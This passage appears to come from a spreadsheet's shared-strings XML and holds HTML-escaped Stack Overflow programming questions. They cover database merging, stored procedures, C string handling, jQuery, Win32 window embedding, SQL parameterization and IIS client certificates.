    <t xml:space="preserve">&lt;p&gt;I have two databases with the same structure. The tables have an integer as a primary key as used in Rails.&lt;/p&gt;
&lt;p&gt;If I have a patients table, I will have one patient using primary key 123 in one database and another patient using the same primary key in the other database.&lt;/p&gt;
&lt;p&gt;What would you suggest for merging the data from both databases?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple way to programmatically get all stored procedures</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to get stored procedures from a SQL Server 2005 Express database using C#? I would like to export all of this data in the same manner that you can script it our using SQL Server Management Studio, without having to install the GUI.&lt;/p&gt;
&lt;p&gt;I've seen some references to do thing via the PowerShell but in the end a C# console app is what I really want.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;To clarify....&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'd like to script out the stored procedures. The list via the &lt;code&gt;Select * from sys.procedures&lt;/code&gt; is helpful, but in the end I need to script out each of these.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open source cad drawing (dwg) library in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone knows of an open source DWG (autocad drawing) library in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generic Java Framework to Manage Bidirectional Associations and Inverse Updates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been looking for a generic way to deal with bidirectional associations and a way to handle the inverse updates in manual written Java code.&lt;/p&gt;
&lt;p&gt;For those who don't know what I'm talking about, here is an example. Below it are my current results of (unsatisfying) solutions.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class A {
    public B getB();
    public void setB(B b);
}
public class B {
    public List&amp;lt;A&amp;gt; getAs();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, when updating any end of the association, in order to maintain consistency, the other end must be updated as well. Either manually each time &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a.setB(b);
b.getA().add(a);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or by putting matching code in the setter / getter and use a custom List implementation.&lt;/p&gt;
&lt;p&gt;I've found an outdated, unmaintained project whose dependencies are no longer available (&lt;a href="https://e-nspire-gemini.dev.java.net/" rel="nofollow"&gt;https://e-nspire-gemini.dev.java.net/&lt;/a&gt;). It deals with the problem by using annotations that are used to inject the necessary code automatically.&lt;/p&gt;
&lt;p&gt;Does anyone know of another framework that deals with this in a generic, unobtrusive way ala gemini?&lt;/p&gt;
&lt;p&gt;ciao,
Elmar&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Aren't Information Expert / Tell Don't Ask at odds with Single Responsibility Principle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It is probably just me, which is why I'm asking the question. Information Expert, Tell Don't Ask, and SRP are often mentioned together as best practices. But I think they are at odds. Here is what I'm talking about:&lt;/p&gt;
&lt;p&gt;Code that favors SRP but violates Tell Don't Ask, Info Expert:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Customer bob = ...;
// TransferObjectFactory has to use Customer's accessors to do its work, 
// violates Tell Don't Ask
CustomerDTO dto = TransferObjectFactory.createFrom(bob);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Code that favors Tell Don't Ask / Info Expert but violates SRP:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Customer bob = ...;
// Now Customer is doing more than just representing the domain concept of Customer,
// violates SRP
CustomerDTO dto = bob.toDTO();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If they are indeed at odds, that's a vindication of my OCD. Otherwise, please fill me in on how these practices can co-exist peacefully. Thank you.&lt;/p&gt;
&lt;p&gt;Edit: someone wants a definition of the terms - &lt;/p&gt;
&lt;p&gt;Information Expert: objects that have the data needed for the operation should host the operation&lt;/p&gt;
&lt;p&gt;Tell Don't Ask: don't ask objects for data in order to do work; tell the objects to do the work&lt;/p&gt;
&lt;p&gt;Single Responsibility Principle: each object should have a narrowly defined responsibility&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does the iPhone timeout if a function takes too long to execute?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a function in which I get en external resource from the web using cocoa's Url object. And it works fine on the simulator, but occasionally fails on the device itself  (it's a google query so the resource obviously does exist). Which leads me to believe that there is some internal timeout barrier on the hardware, but haven't read that such a barrier exists or not.&lt;/p&gt;
&lt;p&gt;Anyone else encountered similar issues? Or knows if the timeout is documented or can be changed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Warning when using mysql_fetch_assoc in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/795746/warning-mysql-fetch-array-supplied-argument-is-not-a-valid-mysql-result"&gt;Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;When I run my php page, I get this error and do not know what's wrong, can anyone help? If anyone needs more infomation, I'll post the whole code.&lt;/p&gt;
&lt;pre&gt;Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
H:\Program Files\EasyPHP 2.0b1\www\test\info.php on line 16&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?PHP
    $user_name = "root";
    $password = "";
    $database = "addressbook";
    $server = "127.0.0.1";
$db_handle = mysql_connect($server, $user_name, $password);
$db_found = mysql_select_db($database, $db_handle);
if ($db_found) {
    $SQL = "SELECT * FROM tb_address_book";
    $result = mysql_query($SQL);
    while ($db_field = mysql_fetch_assoc($result)) {
        print $db_field['ID'] . "&amp;lt;BR&amp;gt;";
        print $db_field['First_Name'] . "&amp;lt;BR&amp;gt;";
        print $db_field['Surname'] . "&amp;lt;BR&amp;gt;";
        print $db_field['Address'] . "&amp;lt;BR&amp;gt;";
    }    
    mysql_close($db_handle);
}
else {
    print "Database NOT Found ";
    mysql_close($db_handle);
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I detect a held down mouse button over a PictureBox?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to fire an event when the mouse is above a PictureBox with the mouse button already clicked and held down.&lt;/p&gt;
&lt;p&gt;Problems: &lt;/p&gt;
&lt;p&gt;The MouseDown and MouseEnter event handlers do not work together very well.&lt;/p&gt;
&lt;p&gt;For instance once a mouse button is clicked and held down, C# will fire the MouseDown event handler, but when the cursor moves over the PictureBox the MouseEnter event does not fire, until the mouse button is realeased.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>strcat() new line, duplicate string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a function that gets the path environment variable of a system, splits up each path, then concats on some other extra characters onto the end of each path.&lt;/p&gt;
&lt;p&gt;Everything works fine until I use the &lt;code&gt;strcat()&lt;/code&gt; function (see code below).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char* prependPath( char* exeName )
{
    char* path = getenv("PATH");  
    char* pathDeepCopy = (char *)malloc(strlen(path) + 1);
    char* token[80];
    int j, i=0; // used to iterate through array
    strcpy(pathDeepCopy, path);
    //parse and split
    token[0] = strtok(pathDeepCopy, ":"); //get pointer to first token found and store in 0
    //place in array
    while(token[i]!= NULL) { //ensure a pointer was found
        i++;
        token[i] = strtok(NULL, ":"); //continue to tokenize the string
    }
    for(j = 0; j &amp;lt;= i-1; j++) {
        strcat(token[j], "/");
        //strcat(token[j], exeName);
        printf("%s\n", token[j]); //print out all of the tokens
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My shell output is like this (I'm concatenating "/which" onto everything):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;...
/usr/local/applic/Maple/bin/which
which/which
/usr/local/applic/opnet/8.1.A.wdmguru/sys/unix/bin/which
which/which
Bus error (core dumped)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm wondering why &lt;code&gt;strcat&lt;/code&gt; is displaying a new line and then repeating &lt;code&gt;which/which&lt;/code&gt;.
I'm also wondering about the &lt;code&gt;Bus error (core dumped)&lt;/code&gt; at the end.&lt;/p&gt;
&lt;p&gt;Has anyone seen this before when using &lt;code&gt;strcat()&lt;/code&gt;?
And if so, anyone know how to fix it?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java EE -- is it just fluff or the real stuff?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm familiar with the LAMP stack and over the years have successfully deployed a handful of web sties based on it. I've used everything from Apache + modPerl, to PHP, to Ruby and Rails. With good use of caching my Rails site can sustain a pretty good load, but I'm not talking massive.&lt;/p&gt;
&lt;p&gt;I never really liked Java as a language, or XML for that matter, and have very much been ignoring the whole Java EE side of things. For those who have had real and direct experience in both worlds: is there something super cool about Java EE that I'm missing, or is just a bunch of hot air? What justifies the high price of the proprietary app servers?&lt;/p&gt;
&lt;p&gt;I'm not trolling here: I'm looking for concrete examples of things that Java EE really nails that are missing from &lt;em&gt;modern&lt;/em&gt; LAMP frameworks, if such differences exist. (Modern = Rails, Django, etc). Alternatively pipe in with those things that LAMP really does better (fewer XML sit ups for one).&lt;/p&gt;
&lt;p&gt;+++++ Update October 16, 2008&lt;/p&gt;
&lt;p&gt;I'm sad to report that most of the replies here are not helpful, and simply fall into one of two categories: "It scales because here are three examples of large web sites" and "It scales because it is really actually much better than the LAMP stack".&lt;/p&gt;
&lt;p&gt;I've done quite a bit of reading, and have concluded that Java EE only has one really good trick: transactions (thanks Will) and as for the rest you can succeed or fail on your own merit, there is nothing intrinsically in the environment to cause you to create a scalable and reliable web site, indeed Java EE has quite a few traps that make it easy to fail (for instance it is easy to start using session beans without realizing that you are paying now for quite a bit of JMS traffic that perhaps could have been avoided with a different design.)&lt;/p&gt;
&lt;p&gt;Useful discussion&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.subbu.org/blog/2007/10/large-scale-web-site-development" rel="nofollow"&gt;http://www.subbu.org/blog/2007/10/large-scale-web-site-development&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://highscalability.com/" rel="nofollow"&gt;http://highscalability.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.oreillynet.com/onlamp/blog/2004/07/php_scales.html" rel="nofollow"&gt;http://www.oreillynet.com/onlamp/blog/2004/07/php_scales.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.schlossnagle.org/~george/blog/index.php?/archives/29-Why-PHP-Scales-A-Cranky,-Snarky-Answer.html" rel="nofollow"&gt;http://www.schlossnagle.org/~george/blog/index.php?/archives/29-Why-PHP-Scales-A-Cranky,-Snarky-Answer.html&lt;/a&gt; &lt;/li&gt;
&lt;li&gt;&lt;a href="http://blogs.law.harvard.edu/philg/2003/09/20/" rel="nofollow"&gt;http://blogs.law.harvard.edu/philg/2003/09/20/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>2D animation in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a simulator in Python, and am curious about options and opinions regarding basic 2D animations. By animation, I'm referring to rendering on the fly, not displaying prerendered images.&lt;/p&gt;
&lt;p&gt;I'm currently using matplotlib (Wxagg backend), and it's possible that I'll be able to continue using it, but I suspect it won't be able to sufficiently scale in terms of performance or capabilities.&lt;/p&gt;
&lt;p&gt;Requirements are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cross-platform (Linux, MacOS X,
Windows)&lt;/li&gt;
&lt;li&gt;Low complexity overhead&lt;/li&gt;
&lt;li&gt;Plays well with wxpython (at least won't step on each other's toes unduly)&lt;/li&gt;
&lt;li&gt;Interactivity. Detect when objects are clicked on, moused over, etc. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that high performance isn't on the list, but the ability to handle ~100 bitmap objects on the screen would be good.&lt;/p&gt;
&lt;p&gt;Your thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the differences between using the New keyword and calling CreateObject in Excel VBA?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What criteria should I use to decide whether I write VBA code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Set xmlDocument = New MSXML2.DOMDocument
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Set xmlDocument = CreateObject("MSXML2.DOMDocument")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Benefits of using a Case statement over an If statement in a stored procedure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi are there any pros / cons relating to the speed that a stored procedure executes when using an IF statement or choosing to use a CASE statement instead?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add the interactive user to a directory in a localized Windows using WiX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I add the Swedish interactive user,  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NT INSTANS\INTERAKTIV
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or the English interactive user,  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NT AUTHORITY\INTERACTIVE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or any other localised user group with &lt;strong&gt;write&lt;/strong&gt; permissions to a program folder's ACL?&lt;/p&gt;
&lt;p&gt;Is this question actually "How do I use &lt;strong&gt;secureObject&lt;/strong&gt;"? I cannot use the &lt;strong&gt;LockPermissions Table&lt;/strong&gt; because I undestand inheritance is removed. &lt;strong&gt;secureObject&lt;/strong&gt; permissions seem to require &lt;strong&gt;CreateDirectory&lt;/strong&gt; rather than &lt;strong&gt;Directory&lt;/strong&gt;... &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looping over elements in jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to loop over the elements of an HTML form, and store the values of the &amp;lt;input&amp;gt; fields in an object. The following code doesn't work, though:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function config() {
    $("#frmMain").children().map(function() {
        var child = $("this");
        if (child.is(":checkbox"))
            this[child.attr("name")] = child.attr("checked");
        if (child.is(":radio, checked"))
            this[child.attr("name")] = child.val();
        if (child.is(":text"))
            this[child.attr("name")] = child.val();
        return null;
    });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Neither does the following (inspired by jobscry's answer):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function config() {
    $("#frmMain").children().each(function() {
        var child = $("this");
        alert(child.length);
        if (child.is(":checkbox")) {
            this[child.attr("name")] = child.attr("checked");
        }
        if (child.is(":radio, checked"))
            this[child.attr("name")] = child.val();
        if (child.is(":text"))
            this[child.attr("name")] = child.val();
    });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The alert always shows that &lt;code&gt;child.length == 0&lt;/code&gt;. Manually selecting the elements works:&lt;/p&gt;
&lt;pre&gt;    
&gt;&gt;&gt; $("#frmMain").children()
Object length=42
&gt;&gt;&gt; $("#frmMain").children().filter(":checkbox")
Object length=3
&lt;/pre&gt;
&lt;p&gt;Any hints on how to do the loop correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do thread functions need to be declared as '__cdecl'?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sample code that shows how to create threads using MFC declares the thread function as both static and &lt;code&gt;__cdecl&lt;/code&gt;.  Why is the latter required?  Boost threads don't bother with this convention, so is it just an anachronism?&lt;/p&gt;
&lt;p&gt;For example (MFC):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static __cdecl UINT MyFunc(LPVOID pParam)
{
...
}
CWinThread* pThread = AfxBeginThread(MyFunc, ...);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whereas Boost:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void func()
{
...
}
boost::thread t;
t.create(&amp;amp;func);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(the code samples might not be 100% correct as I am nowhere near an IDE).&lt;/p&gt;
&lt;p&gt;What is the point of __cdecl?  How does it help when creating threads?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HowTo: Parse the UninstallString reg entry</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\&lt;/code&gt; is the list of installed programs in my machine (at least most of them).
There, there's a String Value called UninstallString which has what you need to run in order to uninstall the program.&lt;br /&gt;
The thing is not every installer writes the same kind of info, yet Windows knows how to parse that string to run the uninstaller.&lt;br /&gt;
My questions are: does anybody know how to parse that string?, meaning what are the possible values it might get? and if not, where can I find that kind of info? I googled around with no luck, I guess I'm not looking for the right terms.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stored procedure not being executed within another stored procedure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have found that SP2 doesn't execute from within SP1 when SP1 is executed.&lt;/p&gt;
&lt;p&gt;Below is the structure of SP1:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER PROCEDURE SP1 AS BEGIN
Declare c1 cursor....
open c1 fetch next from c1 ...
while @@fetch_status = 0 Begin
...
Fetch Next from c1 end
close c1
deallocate c1
exec sp2
end
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;I see non of the PRINT statement outputs if they are printed in the 'Output window' in SQL Server 2005 management studio as the 'Output Window'is empty.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Language features to implement relational algebra</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to encode a relational algebra in Scala (which to my knowlege has one of the most advanced type systems) and just don't seem to find a way to get where I want.&lt;/p&gt;
&lt;p&gt;As I'm not that experienced with the academic field of programming language design I don't really know what feature to look for.&lt;/p&gt;
&lt;p&gt;So what language features would be needed, and what language has those features, to implement a statically verified relational algebra?&lt;/p&gt;
&lt;p&gt;Some of the requirements:
A Tuple is a function mapping names from a statically defined set of valid names for the tuple in question to values of the type specified by the name. Lets call this name-type set the domain.&lt;/p&gt;
&lt;p&gt;A Relation is a Set of Tuples with the same domain such that the range of any tuple is uniqe in the Set&lt;/p&gt;
&lt;p&gt;So far the model can eaisly be modeled in Scala simply by&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;trait Tuple
trait Relation[T&amp;lt;Tuple] extends Set[T]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The vals, vars and defs in Tuple is the name-type set defined above. But there should'n be two defs in Tuple with the same name. Also vars and impure defs should probably be restricted too.&lt;/p&gt;
&lt;p&gt;Now for the tricky part:&lt;/p&gt;
&lt;p&gt;A join of two relations is a relation where the domain of the tuples is the union of the domains from the operands tuples. Such that only tuples having the same ranges for the intersection of their domains is kept.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def join(r1:Relation[T1],r2:Relation[T2]):Relation[T1 with T2]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;should do the trick.&lt;/p&gt;
&lt;p&gt;A projection of a Relation is a Relation where the domain of the tuples is a subset of the operands tuples domain.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def project[T2](r:Relation[T],?1):Relation[T2&amp;gt;:T]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is where I'm not sure if it's even possible to find a sollution. What do you think? What language features are needed to define project?&lt;/p&gt;
&lt;p&gt;Implied above offcourse is that the API has to be usable. Layers and layers of boilerplate is not acceptable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UNIX socket implementation for Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I realize that since UNIX sockets are platform-specific, there has to be some non-Java code involved.  Specifically, we're interested in using JDBC to connect to a MySQL instance which only has UNIX domain sockets enabled.  &lt;/p&gt;
&lt;p&gt;It doesn't look like this is supported, but from what I've read it should be at least possible to write a SocketFactory for JDBC based on UNIX sockets &lt;em&gt;if&lt;/em&gt; we can find a decent implementation of UNIX sockets for Java.  &lt;/p&gt;
&lt;p&gt;Has anyone tried this?  Does anyone know of such an implementation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rich Text in Windows Forms application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to update a Windows Forms application to provide the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;spell checking&lt;/li&gt;
&lt;li&gt;limited formatting of text: bold, italics, bulleted lists&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ideally the formatted text could be accessed in a plain text way for reporting through tools that don't support the formatting, but could also be rendered as HTML for tools that support HTML tags when rendering text.&lt;/p&gt;
&lt;p&gt;It seems to me that the WPF RichTextBox would provide this functionality. What is the best way to incorporate it? Would you suggest other alternatives?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I put a caching server in front of my web site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web site using apache httpd as the server and mysql as the backend. It publishes a "thought for the day" that has gotten so popular that the server is crashing due to the number of requests. Since the same page is been requested (the thought only changes once a day), is it possible to put a caching server in front of my main server, so that when the same request is made by different clients, the caching server returns the page without having to go to the database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to use sessions with MVC and OO PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been working with sessions, MVC design and object oriented PHP. Where should I save or retrieve data from a session? I would like to retrieve it from within methods so I don't have to pass the data to the methods. Whats the best practice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Embedding HWND into external process using SetParent</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to embed a window from my process into the window of an external process using the &lt;strong&gt;SetParent&lt;/strong&gt; function and have encountered a few problems that I'm hoping someone can help me out with. First off, here is an outline of what I am currently doing to embed my window into the application:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HWND myWindow; //Handle to my application window
HWND externalWindow; //Handle to external application window
SetParent(myWindow,externalWindow);
//Remove WS_POPUP style and add WS_CHILD style
DWORD style = GetWindowLong(myWindow,GWL_STYLE);
style = style &amp;amp; ~(WS_POPUP);
style = style | WS_CHILD;
SetWindowLong(myWindow,GWL_STYLE,style);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code works and my window appears in the other application, but introduces the following issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When my window gains input focus, the main application window of the external process loses focus (i.e. title bar changes color)&lt;/li&gt;
&lt;li&gt;Keyboard shortcut commands of the main application do not work while my window has focus&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Does anybody know a workaround for this? I would like my window to be treated as just another child window of the main application.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parsing T-SQL to Parameterize a Query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The application I am currently working on generates a lot of SQL inline queries. All generated SQL is then handed off to a database execution class. I want to write a parsing service for the data execution class that will take a query like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT field1, field2, field3 FROM tablename WHERE foo=1 AND bar="baz"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and turn it into something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT field1, field2, field3 FROM tablename WHERE foo=@p1 AND bar=@p2 blah blah blah
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any thing already written that will accomplish this for me in c# or vb.net? This is intended as a stop gap prior to refactoring the DAL for this project.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; Guys I have a huge application that was ported from Classic ASP to ASP.NET with literally thousands of lines of inline SQL. The only saving grace is all of the generated sql is handed off to a data execution class. I want to capture the sql prior to execution and parameterize them on the fly as a stop gap to rewriting the whole app. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I avoid duplicate content in ASP.NET MVC due to case-insensitive URLs and defaults?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Now I need to solve this problem for real, I did a little more
  investigation and came up with a
  number of things to reduce duplicate
  content. I posted detailed code
  samples on my blog: &lt;a href="http://blog.dantup.me.uk/2009/04/reducing-duplicate-content-with-aspnet.html"&gt;Reducing
  Duplicate Content with ASP.NET MVC&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;First post - go easy if I've marked this up wrong or tagged it badly :P&lt;/p&gt;
&lt;p&gt;In Microsoft's new ASP.NET MVC framework it seems there are two things that could cause your content to be served up at multiple URLs (something which Google penalize for and will cause your PageRank to be split across them):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Case-insensitive URLs&lt;/li&gt;
&lt;li&gt;Default URL&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can set the default controller/action to serve up for requests to the root of your domain. Let's say we choose HomeController/Index. We end up with the following URLs serving up the same content:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;mydomain.com/&lt;/li&gt;
&lt;li&gt;mydomain.com/Home/Index&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now if people start linking to both of these then PageRank would be split. Google would also consider it duplicate content and penalize one of them to avoid duplicates in their results.&lt;/p&gt;
&lt;p&gt;On top of this, the URLs are not case sensitive, so we actually get the same content for these URLs too:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;mydomain.com/Home/Index&lt;/li&gt;
&lt;li&gt;mydomain.com/home/index&lt;/li&gt;
&lt;li&gt;mydomain.com/Home/index&lt;/li&gt;
&lt;li&gt;mydomain.com/home/Index&lt;/li&gt;
&lt;li&gt;(the list goes on)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, the question... How do I avoid these penalties? I would like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;All requests for the default action to be redirected (301 status) to the same url&lt;/li&gt;
&lt;li&gt;All URLs to be case sensitive&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find out what is the new data from an RSS feed, compared with entries already in the database. Then put new entries in db. How?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a database, and an RSS feed. I have to find out what is the new data from an RSS feed, that isn't already in the database. How would you go about approaching this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make an onclientclick post back using jquery? asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need help.  I want to recreate the the update panel postback without using a update panel to do the postback.  What is the generic method for doing this?&lt;/p&gt;
&lt;p&gt;For example, on stackoverflow, when you vote up or down on a question it does a postback to update the database and I would bet they didn't use an update panel.&lt;/p&gt;
&lt;p&gt;What do I have?&lt;/p&gt;
&lt;p&gt;I have a table with table data.  When I click on the "td" item as a whole column, I want to do a update to the database and also update a gridview on the page it self.  The gridview shows all the currently clicked items in the table because it was updated via "our method"...&lt;/p&gt;
&lt;p&gt;Please help, looking for a good generic method I could use for a lot of async postbacks without update panel.&lt;/p&gt;
&lt;p&gt;Looking for a good tutorial of some sorts?&lt;/p&gt;
&lt;p&gt;Thanks guys.
Scott.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accepting client certificates from any CA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am setting up support for users to sign in with client certificates. Unfortunately IIS refuses to acknowledge any certificate not chained to an installed CA (&lt;a href="http://support.microsoft.com/kb/257587" rel="nofollow" title="Description of the Server Authentication Process During the SSL Handshake"&gt;see this article&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;As the feature is implemented only for usersÂ´ convenience, it would be great to allow any client certificate. Is there any way to accomplish this?&lt;/p&gt;
&lt;p&gt;My server is running Windows Server 2003 and IIS 6, but the behaviour is no different on my IIS 7 running locally. If IIS 7 could be customized to support any client certificate, I would be able to change though (given no solution for IIS 6 is available).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any Substitute API for Win32API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need an API that can make menus like Win32API,&lt;br&gt;
But something simpler and better than WinAPI.&lt;br&gt;
That can make GUI, with text zones, buttons etc...like an average Windows program.(Windows GUI Style)&lt;br&gt;
Can anyone recommand on one like it? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Autostart spring app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So is there a way to initialize and start a command line Spring app without writing a main method. It seems like all such main methods have the same form&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static void main(final String[] args) throws Exception {
    ApplicationContext ctx = new ClassPathXmlApplicationContext("context.xml", Boot.class);
    FooService fooService = (FooService) ctx.getBean("fooService");
    fooService.bar();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I suppose that's not complicated, but has someone found a way to provide a way to just specify the &lt;code&gt;context.xml&lt;/code&gt; at the command line or, better yet, in a manifest file?&lt;/p&gt;
&lt;p&gt;The goal here is to simplify the creation of spring applications as executable jars. I hope that I can specify some utility class as the &lt;code&gt;Main-Class&lt;/code&gt; in the manifest. I suppose I would also need to specify the starting point for the app, a bean and a method on it where begins the process.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP access to iTunes tags in an RSS feed</t>
  </si>
  <si>
